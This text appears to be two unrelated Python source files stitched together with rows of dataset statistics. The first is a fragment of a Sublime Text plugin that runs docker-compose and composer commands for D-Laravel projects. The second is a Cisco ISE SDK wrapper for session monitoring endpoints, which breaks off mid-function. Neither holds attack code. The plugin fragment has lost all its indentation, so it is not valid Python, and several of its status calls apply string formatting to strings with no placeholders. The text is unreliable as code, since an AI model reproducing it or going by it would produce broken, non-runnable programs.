if(proc.poll()==0):
self.view.set_status("Dlaravel", "Success" % command)
print(output)
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
else:
self.view.set_status("Dlaravel", "Error" % command)
print(error)
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
def on_done( command ):
this_thread = Thread(target=run_command, args=command.split())
this_thread.start()
if args:
run_command(*args['parameters'])
else:
self.window.show_input_panel("docker-compose", "", on_done, None, None)
class ComposerCommand(sublime_plugin.TextCommand):
def run(self, edit, *args):
#print(self.window)
self.args = args
self.window = self.view.window()
#=====Check Project Folder===========
try:
file = self.window.extract_variables()['file']
dlaravel_folder = re.sub("^(.+?)(/sites/)(.+?)/(.+?)$", "\\1", file)
project_folder = re.sub("^(.+?)(/sites/)(.+?)/(.+?)$", "\\3", file)
folder = "{}/sites/{}".format(dlaravel_folder, project_folder)
except:
folder = self.window.extract_variables()['folder']
dlaravel_folder = re.sub("^(.+?)(/sites/)(.+?)$", "\\1", folder)
try:
dlaravel_release = open("{}/etc/dlaravel-release".format(dlaravel_folder),"r").read()
print("Project Folder: {}".format(folder))
print(dlaravel_release)
except:
print("Unable to find D-Laravel folder.")
print("You can download it at https://github.com/DevinY/dlaravel.")
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
self.view.set_status("Dlaravel","Unable to find D-Laravel")
return False
self.view.set_status("Dlaravel", "artisan command will be run in {}".format(folder))
project_folder = re.sub("^(.+?)(/sites/)(.+?)$", "\\3", folder)
#===============================
def run_command(*args):
dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
args=list(args)
if "composer" in args:
del args[0]
#print(args)
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
msg='Command is issued (composer {}), Please wait...'.format(' '.join(list(args)))
print(msg)
self.view.set_status("Dlaravel", msg)
command=["docker-compose","-f","{}/docker-compose.yml".format(dlaravel_basepath),"exec","-w","/var/www/html/{}".format(dlaravel_project),"-u","dlaravel","-T","php","composer"]+args
proc=Popen(command ,bufsize=0, stdout=PIPE,stderr=PIPE, universal_newlines=True);
output, error = proc.communicate()
proc.wait()
exit_code=proc.poll()
self.window.run_command("show_panel", {"panel": "console"})
if(exit_code==0):
self.view.set_status("Dlaravel","composer {} is done.".format(' '.join(args)))
print(output)
self.window.run_command("hide_panel", {"panel": "console"})
else:
self.view.set_status("Dlaravel","Unable to find D-Laravel")
print(error)
def on_done( command ):
args = command.split()
this_thread = Thread(target=run_command, args=args)
this_thread.start()
#self.view.window().run_command("hide_panel", {"panel": "console"})
self.window.show_input_panel("({}) composer".format(project_folder), "", on_done, None, None)
class ConsoleUpCommand(sublime_plugin.TextCommand):
def run(self, edit):
def run_command(*args):
folder = self.window.extract_variables()['folder']
arg = "up -d --remove-orphans".split()
dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
command=["docker-compose","-f","{}/docker-compose.yml".format(dlaravel_basepath)]+arg
print(command)
proc=Popen(command ,bufsize=1, stdout=PIPE,stderr=PIPE, universal_newlines=True);
output, error = proc.communicate()
proc.wait()
if(proc.poll()==0):
self.view.set_status("Dlaravel", "console up success" % command)
arg = "ps".split()
command=["docker-compose","-f","{}/docker-compose.yml".format(dlaravel_basepath)]+arg
proc=Popen(command ,bufsize=1, stdout=PIPE,stderr=PIPE, universal_newlines=True);
output = proc.communicate()[0]
print(output)
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
else:
self.view.set_status("Dlaravel", "Error" % command)
print(error)
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
self.window = self.view.window()
this_thread = Thread(target=run_command)
this_thread.start()
class ConsoleDownCommand(sublime_plugin.TextCommand):
def run(self, edit):
self.window = self.view.window()
def run_command():
folder = self.window.extract_variables()['folder']
arg = "down".split()
dlaravel_project = re.sub(".*sites/(.+$)", "\\1", folder)
dlaravel_basepath = re.sub("(^.*)/sites/(.+$)", "\\1", folder)
command=["docker-compose","--no-ansi","-f","{}/docker-compose.yml".format(dlaravel_basepath)]+arg
proc=Popen(command ,bufsize=1, stdout=PIPE,stderr=PIPE, universal_newlines=True);
output, error = proc.communicate()
proc.wait()
print(error)
if(proc.poll()==0):
self.view.set_status("Dlaravel", "console down Success" % command)
arg = "ps".split()
command=["docker-compose","-f","{}/docker-compose.yml".format(dlaravel_basepath)]+arg
proc=Popen(command ,bufsize=1, stdout=PIPE,stderr=PIPE, universal_newlines=True);
output = proc.communicate()[0]
print(output)
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
else:
self.view.set_status("Dlaravel", "Error" % command)
print(error)
self.window.run_command("show_panel", {"panel": "console", "toggle": True})
self.window = self.view.window()
this_thread = Thread(target=run_command)
this_thread.start()
| 48.367213
| 203
| 0.557416
| 1,602
| 14,752
| 5.006866
| 0.094257
| 0.054856
| 0.027428
| 0.024685
| 0.871338
| 0.844284
| 0.822591
| 0.78656
| 0.760878
| 0.760878
| 0
| 0.004502
| 0.262202
| 14,752
| 305
| 204
| 48.367213
| 0.732451
| 0.019184
| 0
| 0.74902
| 0
| 0
| 0.185131
| 0.030982
| 0
| 0
| 0
| 0
| 0
| 1
| 0.07451
| false
| 0
| 0.011765
| 0
| 0.121569
| 0.121569
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0aabfb486b1558fcfbd748b7f9ab785d40e64894
| 43,273
|
py
|
Python
|
ciscoisesdk/api/v3_1_1/misc.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 36
|
2021-05-18T16:24:19.000Z
|
2022-03-05T13:44:41.000Z
|
ciscoisesdk/api/v3_1_1/misc.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 15
|
2021-06-08T19:03:37.000Z
|
2022-02-25T14:47:33.000Z
|
ciscoisesdk/api/v3_1_1/misc.py
|
CiscoISE/ciscoisesdk
|
860b0fc7cc15d0c2a39c64608195a7ab3d5f4885
|
[
"MIT"
] | 6
|
2021-06-10T09:32:01.000Z
|
2022-01-12T08:34:39.000Z
|
# -*- coding: utf-8 -*-
"""Cisco Identity Services Engine Misc API wrapper.
Copyright (c) 2021 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import *
from past.builtins import basestring
from ...restsession import RestSession
from ...utils import (
check_type,
dict_from_items_with_values,
apply_path_params,
dict_of_str,
get_next_page,
)
class Misc(object):
"""Identity Services Engine Misc API (version: 3.1.1).
Wraps the Identity Services Engine Misc
API and exposes the API as native Python
methods that return native Python objects.
"""
def __init__(self, session, object_factory, request_validator):
"""Initialize a new Misc
object with the provided RestSession.
Args:
session(RestSession): The RESTful session object to be used for
API calls to the Identity Services Engine service.
Raises:
TypeError: If the parameter types are incorrect.
"""
check_type(session, RestSession)
super(Misc, self).__init__()
self._session = session
self._object_factory = object_factory
self._request_validator = request_validator
def get_active_count(self,
headers=None,
**query_parameters):
"""ActiveCount.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
e_url = ('/admin/API/mnt/Session/ActiveCount')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_e629f554fa652d980ff08988c788c57_v3_1_1', _api_response)
def get_active_list(self,
headers=None,
**query_parameters):
"""ActiveList.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
e_url = ('/admin/API/mnt/Session/ActiveList')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_a6c71a1e4d2597ea1b5533e9f1b438f_v3_1_1', _api_response)
def get_session_auth_list(self,
headers=None,
**query_parameters):
"""Session/AuthList.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
e_url = ('/admin/API/mnt/Session/AuthList/null/null')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_d91e71e5b84583fb8ea91fcd9fb6751_v3_1_1', _api_response)
def get_posture_count(self,
headers=None,
**query_parameters):
"""PostureCount.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
e_url = ('/admin/API/mnt/Session/PostureCount')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_d51ebdbbc75c0f8ed6161ae070a276_v3_1_1', _api_response)
def get_profiler_count(self,
headers=None,
**query_parameters):
"""ProfilerCount.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
e_url = ('/admin/API/mnt/Session/ProfilerCount')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_bdb77066ba75002bd343de0e9120b86_v3_1_1', _api_response)
def get_sessions_by_mac(self,
mac,
headers=None,
**query_parameters):
"""Sessions by MAC.
Args:
mac(basestring): mac path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(mac, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'mac': mac,
}
e_url = ('/admin/API/mnt/Session/MACAddress/{mac}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_b93e1accc1f35864b9a5b7bc478c7a7c_v3_1_1', _api_response)
def get_sessions_by_username(self,
username,
headers=None,
**query_parameters):
"""Sessions by Username.
Args:
username(basestring): username path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(username, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'username': username,
}
e_url = ('/admin/API/mnt/Session/UserName/{username}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_e037613954b58692d89d64eba681_v3_1_1', _api_response)
def get_sessions_by_nas_ip(self,
nas_ipv4,
headers=None,
**query_parameters):
"""Sessions by NAS IP.
Args:
nas_ipv4(basestring): nas_ipv4 path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(nas_ipv4, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'nas_ipv4': nas_ipv4,
}
e_url = ('/admin/API/mnt/Session/IPAddress/{nas_ipv4}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_fb7171efd5df8a0fe319983882265_v3_1_1', _api_response)
def get_sessions_by_endpoint_ip(self,
endpoint_ipv4,
headers=None,
**query_parameters):
"""Sessions by Endpoint IP.
Args:
endpoint_ipv4(basestring): endpoint_ipv4 path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(endpoint_ipv4, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'endpoint_ipv4': endpoint_ipv4,
}
e_url = ('/admin/API/mnt/Session/EndPointIPAddress/{endpoint_ipv4}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_c7f72c6db5ecbb380133c106d0566_v3_1_1', _api_response)
def get_sessions_by_session_id(self,
session_id,
headers=None,
**query_parameters):
"""Sessions by SessionID.
Args:
session_id(basestring): session_id path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(session_id, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'session_id': session_id,
}
e_url = ('/admin/API/mnt/Session/Active/SessionID/{session_id}/0')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_eb415db854f5b12aa326bde54285c59_v3_1_1', _api_response)
def delete_all_sessions(self,
headers=None,
**query_parameters):
"""Delete All Sessions.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
e_url = ('/admin/API/mnt/Session/Delete/All')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.delete(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.delete(endpoint_full_url, params=_params)
return self._object_factory('bpm_bd2a2c3735c6ca7b59c86d428e222_v3_1_1', _api_response)
def get_mnt_version(self,
headers=None,
**query_parameters):
"""MNT Version.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
e_url = ('/admin/API/mnt/Version')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_fc354ec4d361514a8e949f628f8e5f89_v3_1_1', _api_response)
def get_failure_reasons(self,
headers=None,
**query_parameters):
"""FailureReasons.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
}
e_url = ('/admin/API/mnt/FailureReasons')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_e346dbd9f9df554da3a3bcc06f4e77d5_v3_1_1', _api_response)
def get_authentication_status_by_mac(self,
mac,
rec_ord_s,
sec_ond_s,
headers=None,
**query_parameters):
"""AuthenticationStatus by MAC.
Args:
mac(basestring): MAC path parameter.
sec_ond_s(basestring): SECONDS path parameter.
rec_ord_s(basestring): RECORDS path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(mac, basestring,
may_be_none=False)
check_type(sec_ond_s, basestring,
may_be_none=False)
check_type(rec_ord_s, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'MAC': mac,
'SECONDS': sec_ond_s,
'RECORDS': rec_ord_s,
}
e_url = ('/admin/API/mnt/AuthStatus/MACAddress/{MAC}/{SECONDS}/{RE'
+ 'CORDS}/All')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_b26746235997bc32ace7d67d6987_v3_1_1', _api_response)
def session_reauthentication_by_mac(self,
end_poi_ntm_ac,
psn_nam_e,
rea_uth_typ_e,
headers=None,
**query_parameters):
"""Session Reauthentication by MAC.
Args:
psn_nam_e(basestring): PSN_NAME path parameter.
end_poi_ntm_ac(basestring): ENDPOINT_MAC path parameter.
rea_uth_typ_e(basestring): REAUTH_TYPE path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(psn_nam_e, basestring,
may_be_none=False)
check_type(end_poi_ntm_ac, basestring,
may_be_none=False)
check_type(rea_uth_typ_e, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'PSN_NAME': psn_nam_e,
'ENDPOINT_MAC': end_poi_ntm_ac,
'REAUTH_TYPE': rea_uth_typ_e,
}
e_url = ('/admin/API/mnt/CoA/Reauth/{PSN_NAME}/{ENDPOINT_MAC}/{REA'
+ 'UTH_TYPE}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
_api_response = self._session.get(endpoint_full_url, params=_params,
headers=_headers)
else:
_api_response = self._session.get(endpoint_full_url, params=_params)
return self._object_factory('bpm_f73477346fb5e7097d915c7f0a99659_v3_1_1', _api_response)
def session_disconnect(self,
dis_con_nec_tty_pe,
end_poi_nti_p,
mac,
nas_ipv4,
psn_nam_e,
headers=None,
**query_parameters):
"""Session Disconnect.
Args:
end_poi_nti_p(basestring): ENDPOINT_IP path parameter.
psn_nam_e(basestring): PSN_NAME path parameter.
mac(basestring): MAC path parameter.
dis_con_nec_tty_pe(basestring): DISCONNECT_TYPE path
parameter.
nas_ipv4(basestring): NAS_IPV4 path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**query_parameters: Additional query parameters (provides
support for parameters that may be added in the future).
Returns:
RestResponse: REST response with following properties:
- headers(MyDict): response headers.
- response(MyDict): response body as a MyDict object. Access the object's properties by using the dot notation
or the bracket notation.
- content(bytes): representation of the request's response
- text(str): representation of the request's response
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the Identity Services Engine cloud returns an error.
"""
check_type(headers, dict)
if headers is not None:
if 'Accept' in headers:
check_type(headers.get('Accept'),
basestring, may_be_none=False)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
check_type(end_poi_nti_p, basestring,
may_be_none=False)
check_type(psn_nam_e, basestring,
may_be_none=False)
check_type(mac, basestring,
may_be_none=False)
check_type(dis_con_nec_tty_pe, basestring,
may_be_none=False)
check_type(nas_ipv4, basestring,
may_be_none=False)
_params = {
}
_params.update(query_parameters)
_params = dict_from_items_with_values(_params)
path_params = {
'ENDPOINT_IP': end_poi_nti_p,
'PSN_NAME': psn_nam_e,
'MAC': mac,
